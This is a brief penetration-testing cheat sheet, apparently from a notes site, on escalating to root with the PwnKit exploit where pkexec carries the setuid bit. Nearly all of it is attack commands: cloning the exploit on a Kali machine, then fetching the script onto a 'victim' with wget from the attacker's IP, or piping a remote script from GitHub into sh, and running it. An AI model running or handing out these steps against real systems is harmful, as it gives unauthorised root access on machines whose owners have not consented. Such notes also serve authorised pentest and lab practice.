PwnKit

  • Used for privilege escalation if pkexec binary has the special bit permission

On Kali machine:
    git clone https://github.com/ly4k/PwnKit.git
    
On Victim machine:
    wget http://<Kali IP>/PwnKit.sh && chmod +x PwnKit.sh
    ./PwnKit.sh
    
        Or
    
    sh -c "$(curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit.sh)"

Last updated